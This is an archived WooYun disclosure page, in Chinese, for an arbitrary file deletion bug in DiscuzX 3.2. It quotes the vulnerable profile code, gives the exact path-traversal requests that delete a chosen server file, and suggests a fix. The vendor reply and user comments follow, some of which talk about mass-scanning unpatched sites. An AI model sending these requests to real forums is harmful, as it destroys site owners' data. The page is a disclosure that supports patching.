当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065513

漏洞标题:DiscuzX 任意文件操作漏洞

相关厂商:Discuz!

漏洞作者: Map

提交时间:2014-06-19 19:10

修复时间:2014-09-17 19:12

公开时间:2014-09-17 19:12

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-20: 厂商已经确认,细节仅向厂商公开
2014-06-23: 细节向第三方安全合作伙伴开放
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-17: 细节向公众公开

简要描述:

DiscuzX 任意文件操作漏洞

详细说明:

漏洞实际上是任意文件删除,但是由于删除的函数容易被定位,所以不方便写在简要描述或标题内。
昨天下载DiscuzX 3.2的代码,在
source/include/spacecp/spacecp_profile.php 中找到以下代码:

if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
	foreach($_GET['deletefile'] as $key => $value) {
		if(isset($_G['cache']['profilesetting'][$key])) {
			echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
			@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
			@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
			$verifyarr[$key] = $setarr[$key] = '';
		}
	}
}


往上跟发现$_GET['deletefile']没有任何处理,$space[$key]来自

$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');


所以我们需要在$space变量中找到一个存在需要被删除的文件的位置,我用的字段是birthprovince

我们第一次在birthprovince里加上我们要删除的文件然后保存资料,下次我们提交$_GET['deletefile'][birthprovince],那么$space[birthprovince]指向的文件就会被删除。


也就是说,我们提交birthprovince为../../../robots.txt
保存完之后,数据库里的$space['birthprovice']会成为../../../robots.txt,当我们提交$_GET['deletefile'][birthprovince]的时候,会去删除$space['birthprovice']指向的文件。
操作步骤:
那么登陆后提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0
注意,85cf7ef0是你的formhash。
http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base
提示保存成功
这个时候你的birthprovince就是../../../robots.txt,产生的$space['birthprovince']就是../../../robots.txt了。
接下来我们来进行参数的操作,提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0

http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa
OK,文件就被顺利删除了。

漏洞证明:

如上面所述。

修复方案:

检查下deletefile指向的key是不是自定义字段里允许FILES的字段。

版权声明:转载请注明来源 Map@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-20 10:24

厂商回复:

感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-19 19:16 | YouYaX(乌云厂商)

    神奇神奇

  2. 2014-06-19 19:16 | 筱阳 ( 路人 | Rank:0 漏洞数:4 | 俺是小彩笔。)

    坐等 神奇的路人甲

  3. 2014-06-19 19:21 | mu0u ( 路人 | Rank:2 漏洞数:1 | 先做人,后做事。)

    神奇的路人甲

  4. 2014-06-19 19:49 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    雷劈吗?

  5. 2014-06-19 20:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    那不是可以拿shell?

  6. 2014-06-19 20:16 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    火前留名呢,这是要发呀

  7. 2014-06-19 20:55 | 神奇的路人甲 ( 实习白帽子 | Rank:63 漏洞数:16 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    神奇的路人甲

  8. 2014-06-19 21:45 | 逗b炮 ( 路人 | Rank:20 漏洞数:1 | muyou)

    坐等忽略!

  9. 2014-06-20 10:14 | 沙加 ( 路人 | Rank:8 漏洞数:1 | 专注漏洞三十年)

    貌似恨屌的樣子

  10. 2014-06-20 10:25 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    默默mark

  11. 2014-06-20 12:17 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

  12. 2014-06-23 10:33 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

  13. 2014-06-23 10:45 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    神器

  14. 2014-06-26 19:41 | 猛虎 ( 路人 | Rank:21 漏洞数:4 | 分享快乐与痛苦。)

    听起来,很好,关注

  15. 2014-06-27 18:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    为什么不拿shell呢

  16. 2014-07-03 16:23 | 西顾 ( 路人 | Rank:0 漏洞数:1 | 保守主义,展元爱好者,啥都不会)

    mark

  17. 2014-08-20 14:43 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    多方准备啥时候发补丁,外面文件都被删完了。

  18. 2014-09-17 19:54 | Suner ( 路人 | Rank:21 漏洞数:2 | 洞次打次)

    神奇的进攻思路

  19. 2014-09-18 08:40 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    都是一些神人

  20. 2014-09-18 10:09 | Seven.Sea ( 实习白帽子 | Rank:76 漏洞数:24 | 唯有安全与美食不可辜负。)

    默默mark,脑洞大开的进攻思路

  21. 2014-10-08 15:05 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Hmily 可能因为删文件不废电

  22. 2014-11-24 16:09 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    貌似一直没发补丁?

  23. 2014-11-24 16:15 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    @D&G 偷偷发了,官方没法公告,只在原来的版本上修改文件,外面基本全部没有修复,搞个exp一扫一片一片的。

  24. 2014-11-24 16:49 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @Hmily 我在http://www.discuz.net/thread-3457145-1-1.html 这里下载的X3.1 完整版是存在漏洞的。然后下了最新的0630补丁看了下,也没看到有修复spacecp_profile.php这个文件。 是在完整包上直接改文件了么?

  25. 2014-11-24 16:53 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    @D&G 3.1早不管了,N多0day都没修复,只有3.2这里的 http://download.comsenz.com/DiscuzX/3.2/ 修了。

  26. 2014-11-24 16:56 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @Hmily 恩,谢了。3.1已经不管了啊。。。。这可怎么过。

  27. 2014-11-24 19:54 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    @D&G 你是要自己修?自己diff下就知道怎么修了啊。

  28. 2014-11-25 08:34 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @Hmily 恩。自己修,按照3.2的方法修的。感觉discuz有点坑。

  29. 2014-11-26 23:19 | 我还爱 ( 路人 | Rank:0 漏洞数:1 | 虚心学习)

    @D&G 大牛你好,我测试的程序跟你下载的一样,但是我没有成功删掉文件,只是最后显示了success,不知道为什么,

  30. 2014-11-27 08:41 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    X3.1 ?如果是没打过补丁的,应该是可以的。多输出调试一下看看吧。

  31. 2015-06-07 00:11 | lansebird ( 路人 | Rank:0 漏洞数:1 | 飞跃马尔代夫)

    路过,学习学习前辈